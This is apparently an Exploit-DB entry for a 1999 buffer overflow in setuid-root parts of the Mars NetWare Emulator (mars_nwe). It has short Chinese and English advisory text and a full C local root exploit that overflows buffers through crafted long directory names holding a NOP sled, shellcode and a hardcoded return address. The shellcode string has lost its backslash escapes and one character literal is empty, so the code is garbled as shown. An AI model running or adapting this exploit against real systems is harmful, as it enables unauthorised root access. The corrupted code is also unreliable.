https://www.exploit-db.com/exploits/19485
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199908-059

MarsNetWareEmulation(NWE，mars_nwe)数据包存在缓冲区溢出漏洞。可以借助长目录名导致该漏洞。

source: http://www.securityfocus.com/bid/617/info


There are several buffer overflows in the setuid root components of the Mars Netware Emulator package. They allow for a local root compromise through the overflowing of buffers without bounds checking. It is to be assumed that all versions prior to and including 0.99 are vulnerable to these attacks. 

// get a suid shell :)

#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#include <unistd.h>

#define BUFSIZE		254
#define NOP		0x90
#define RET		0xbffff3a0
#define ALIGN		1

int makedir(dir)
char *dir;
{

	if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
		return -1;

	if (chdir(dir))
		return -1;

	return 0;
}
	

int main(void)
{
	int i = 0, noplen = 0;
	char pid[10], buf[BUFSIZE], *ptr = NULL;

	char szelkod[] =

		"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0d"
		"x31xc9xb1x88x80x36x01x46xe2xfaxeax19x2e"
		"x63x68x6fx2ex62x69x6cx6ex65x01x35x36x34"
		"x34x01x2ex63x68x6fx2ex72x69x01x88xf7x54"
		"x88xe4x82xedx19x56x57x52xe9x01x01x01x01"
		"x5ax80xc2xcfx11x01x01x8cxbax0bxeexfexfe"
		"x88x7cxf1x8cx82x14xeexfexfex88x44xf5x8c"
		"x92x1bxeexfexfex88x54xf9xc6x44xfdx01x01"
		"x01x01xb9x47x01x01x01x30xf7x30xc8x52x88"
		"xf2xccx81x8cx44xf1x88xc0xb9x0ax01x01x01"
		"x88xffx30xd3x52x88xf2xccx81x8cx64xddx5a"
		"x5fx5exc8xc2x91x91x91x91x91x91x91x91x91"
		"x91x91x91x00";

	sprintf(pid, "%d", getpid());

	if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
	{
		perror("mkdir()");
		return -1;
	}

	if (chdir(pid))
	{
		perror("chdir()");
		return -1;
	}

	ptr = buf;
	noplen = BUFSIZE - strlen(szelkod);

	for (i=0;i<noplen;i++)
		*ptr++ = NOP;

	*ptr += noplen;

	for (i=0;i<strlen(szelkod);i++)
		*ptr++ = szelkod[i];

	*ptr = '';

	if(makedir(buf) < 0)
	{
		perror("makedir()");
		return -1;
	}

	bzero(buf, BUFSIZE);
	memset(buf, NOP, 40 + ALIGN);

	if(makedir(buf) < 0)
	{
		perror("makedir()");
		return -1;
	}

	bzero(buf, BUFSIZE);

	for(i=0;i<96;i+=4)
		*(long *)&buf[i] = RET;

	for(i=0;i<2;i++)
	{

		if(makedir(buf) < 0)
		{
			perror("makedir()");
			return -1;
		}
	}

	return 0;
}

来源:BID
名称:617
链接:http://www.securityfocus.com/bid/617